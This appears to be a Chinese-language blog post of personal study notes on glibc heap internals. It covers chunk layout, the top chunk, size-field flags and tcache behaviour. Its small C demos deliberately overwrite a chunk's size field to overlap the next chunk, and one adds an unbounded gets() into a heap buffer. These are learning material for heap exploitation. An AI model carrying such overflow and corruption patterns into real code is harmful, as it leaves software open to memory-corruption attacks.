<h3 id="two（申请chunk后堆上的chunk分布是怎么样的？）（2022-07-18）"><a href="#two（申请chunk后堆上的chunk分布是怎么样的？）（2022-07-18）" class="headerlink" title="two（申请chunk后堆上的chunk分布是怎么样的？）（2022/07/18）"></a>two（申请chunk后堆上的chunk分布是怎么样的？）（2022/07/18）</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">//源C代码  cs1e.c</span><br><span class="line">//gcc -g cs1e.c -o cs1e</span><br><span class="line">#include&lt;stdio.h&gt;</span><br><span class="line">int main(void)</span><br><span class="line">&#123;</span><br><span class="line">    void *hollk, *hollk1; //0之前vmmap指令查看不到heap堆</span><br><span class="line">    hollk = malloc(0x10); //0 分配第一个0x10的chunk 此时vmmap可以查看到内存上分出了堆空间</span><br><span class="line">    malloc(0x10);    //1 分配第二个0x10的chunk</span><br><span class="line">    </span><br><span class="line">    malloc(0x20);    //2</span><br><span class="line">    malloc(0x30);    //3</span><br><span class="line">    malloc(0x40);    //4  heap此时大小为0x21000字节</span><br><span class="line">    malloc(0x42000); //5  现在申请0x42000字节看heap增大到多少。 结果：heap并未增长</span><br><span class="line">    </span><br><span class="line">    *(long long *)((long long)hollk - 0x8) = 0x41;// 修改第一个块的size域</span><br><span class="line">    free(hollk);</span><br><span class="line">    hollk1 = malloc(0x30);// 实现extend，控制了第二个块的内容</span><br><span class="line">    return 0;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><img src="image-20220718132324717.png" alt="image-20220718132324717"></p>
<p><img src="image-20220718151556184.png" alt="image-20220718151556184"></p>
<p><img src="image-20220718151124041.png" alt="image-20220718151124041"></p>
<p><img src="image-20220718151809247.png" alt="image-20220718151809247"></p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;可以看出当malloc申请一个大于当前初始分配的堆空间时没有立马扩大当前的堆区，而是先在Memory Mapping Segment 中调用了一段空间，或许之后利用到这块空间时，堆管理器才会向操作系统申请一块更大的堆空间来完成对这段0x42000字节空间的分配。总之很多细节本人目前也不了解，没研究过源码，也找不到相关的学习资料，只能靠个人的猜测。以下是百度找来的图片，帮助理解</p>
<p><img src="watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQyMDI0MDY3,size_16,color_FFFFFF,t_70.png" alt="在这里插入图片描述"></p>
<p>小结：</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;不难发现，top chunk的空间从20d50—&gt;20d30—&gt;20d00—&gt;20cc0—&gt;20c70，说明在bin中无合适（目前没有执行过free，bin表为空）chunk的情况下新的chunk的申请空间直接从top chunk划分出来，并紧挨着top chunk</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;发现的小知识：以上代码申请到的堆空间大小为0x7a000-0x59000 = 0x21000 = 135168 B = 132 KB，也就是说默认分配了132KB的内存空间作为堆的空间</p>
<p><img src="image-20220718135030412.png" alt="image-20220718135030412"></p>
<p>目前的堆结构可由下图表示(个人的理解)：对了，top chunk也是有chunk头的，图中没表示出来</p>
<p><img src="image-20220718133927099.png" alt="image-20220718133927099"></p>
<p><strong>发现只有prev_size、size、user_data三段，fd、bk未发现。思考+百度后个人在想：可能只有free掉chunk后，chunk进入bin中才会出现fd、bk字段</strong></p>
<p>看到了一篇文章，事实证明我的猜测没有错[机智]：<a target="_blank" rel="noopener" href="https://www.cnblogs.com/unr4v31/p/14446412.html">Glibc堆管理机制基础 - unr4v31 - 博客园 (cnblogs.com)</a></p>
<br/>

<h3 id="three（实操-看文章后对alloced-chunk的理解）（2022-07-18）"><a href="#three（实操-看文章后对alloced-chunk的理解）（2022-07-18）" class="headerlink" title="three（实操+看文章后对alloced chunk的理解）（2022/07/18）"></a>three（实操+看文章后对alloced chunk的理解）（2022/07/18）</h3><p>ctf-wiki中说到：</p>
<ul>
<li><strong>prev_size</strong>, 如果该 chunk 的<strong>物理相邻的前一地址 chunk（两个指针的地址差值为前一 chunk 大小）</strong>是空闲的话，那该字段记录的是前一个 chunk 的大小 (包括 chunk 头)。否则，该字段可以用来存储物理相邻的前一个 chunk 的数据。<strong>这里的前一 chunk 指的是较低地址的 chunk</strong> 。</li>
</ul>
<p><img src="image-20220718193419657.png" alt="image-20220718193419657"></p>
<ul>
<li>size，该 chunk 的大小，大小必须是 2 * SIZE_SZ 的整数倍。如果申请的内存大小不是 2 * SIZE_SZ 的整数倍，会被转换满足大小的最小的 2 * SIZE_SZ 的倍数。32 位系统中，SIZE_SZ 是 4；64 位系统中，SIZE_SZ 是 8。 该字段的低三个比特位对 chunk 的大小没有影响，它们从高到低分别表示<ul>
<li>NON_MAIN_ARENA，记录当前 chunk 是否不属于主线程，1 表示不属于，0 表示属于。</li>
<li>IS_MAPPED，记录当前 chunk 是否是由 mmap 分配的。</li>
<li>PREV_INUSE，记录前一个 chunk 块是否被分配。一般来说，堆中第一个被分配的内存块的 size 字段的 P 位都会被设置为 1，以便于防止访问前面的非法内存。当一个 chunk 的 size 的 P 位为 0 时，我们能通过 prev_size 字段来获取上一个 chunk 的大小以及地址。这也方便进行空闲 chunk 之间的合并。</li>
</ul>
</li>
</ul>
<p>对于fd、bk、fd_nextsize、bk_nextsize，到了相应类型的chunk再提，以上是alloced chunk（已分配且正在使用）</p>
<br/>

<h3 id="four（free-chunk）（2022-07-18）"><a href="#four（free-chunk）（2022-07-18）" class="headerlink" title="four（free chunk）（2022/07/18）"></a>four（free chunk）（2022/07/18）</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">//源C代码  cs1.c</span><br><span class="line">//gcc -g cs1.c -o cs1</span><br><span class="line">#include&lt;stdio.h&gt;</span><br><span class="line">int main(void)</span><br><span class="line">&#123;</span><br><span class="line">    void *hollk, *hollk1; //0之前vmmap指令查看不到heap堆</span><br><span class="line">    hollk = malloc(0x10); //0 分配第一个0x10的chunk 此时vmmap可以查看到内存上分出了堆空间</span><br><span class="line">    malloc(0x10);    //1 分配第二个0x10的chunk</span><br><span class="line">    *(long long *)((long long)hollk - 0x8) = 0x41;// 修改第一个块的size域</span><br><span class="line">    free(hollk);</span><br><span class="line">    hollk1 = malloc(0x30);// 实现extend，控制了第二个块的内容</span><br><span class="line">    return 0;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><img src="image-20220718200732624.png" alt="image-20220718200732624"></p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;free(hollk); 过后，上图中的bin中的tcachebins出现了记录，并没有出现在fastbins中，应该是Ubuntu20.04版本用到了新的堆管理机制。</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;目前我要实验学习的东西与我的现有环境不匹配，所以后续实验只能暂时打住。</p>
<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;之后呢先看看理论，试着做做堆题，要是能把握住，暂时就带着这点基础深入学习堆漏洞，若学着吃力学得慢，有些细节弄不明白的话我再考虑装个Ubuntu16.04虚拟机然后继续实验，底层逻辑都搞懂了再继续深入</p>
<br/>

<h3 id="five（2022-07-20）"><a href="#five（2022-07-20）" class="headerlink" title="five（2022/07/20）"></a>five（2022/07/20）</h3><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//源C代码  cs1f.c</span></span><br><span class="line"><span class="comment">//gcc -g cs1f.c -o cs1f</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">(<span class="keyword">void</span>)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">void</span> *hollk, *hollk1; <span class="comment">//0之前vmmap指令查看不到heap堆</span></span><br><span class="line">    hollk = <span class="built_in">malloc</span>(<span class="number">0x10</span>); <span class="comment">//0 分配第一个0x10的chunk 此时vmmap可以查看到内存上分出了堆空间</span></span><br><span class="line">    <span class="built_in">malloc</span>(<span class="number">0x10</span>);    <span class="comment">//1 分配第二个0x10的chunk</span></span><br><span class="line">    </span><br><span class="line">    gets(hollk);</span><br><span class="line">    </span><br><span class="line">    *(<span class="keyword">long</span> <span class="keyword">long</span> *)((<span class="keyword">long</span> <span class="keyword">long</span>)hollk - <span class="number">0x8</span>) = <span class="number">0x41</span>;<span class="comment">// 修改第一个块的size域</span></span><br><span class="line">    <span class="built_in">free</span>(hollk);</span><br><span class="line">    hollk1 = <span class="built_in">malloc</span>(<span class="number">0x30</span>);<span class="comment">// 实现extend，控制了第二个块的内容</span></span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><img src="image-20220720090927920.png" alt="image-20220720090927920"></p>
<p>至于top chunk为什么缩小了那么多（20d30—&gt;20920）见下图</p>
<p><img src="image-20220720092935239.png" alt="image-20220720092935239"></p>
<br/>

    </div>

    
    
    

    <footer class="post-footer">

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2022/07/03/%E6%B1%87%E7%BC%96%E7%AC%94%E8%AE%B01/" rel="prev" title="汇编笔记1">
                  <i class="fa fa-chevron-left"></i> 汇编笔记1
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2022/08/04/shellcode%E7%BC%96%E5%86%99/" rel="next" title="shellcode编写">
                  shellcode编写 <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">


<div class="copyright">
  &copy; 
  <span itemprop="copyrightYear">2022</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">xiaoxiaoxy</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/muse/" rel="noopener" target="_blank">NexT.Muse</a>
  </div>

    </div>
  </footer>

  
  <script src="https://cdn.jsdelivr.net/npm/animejs@3.2.1/lib/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/schemes/muse.js"></script><script src="/js/next-boot.js"></script>

  





  





</body>
</html>
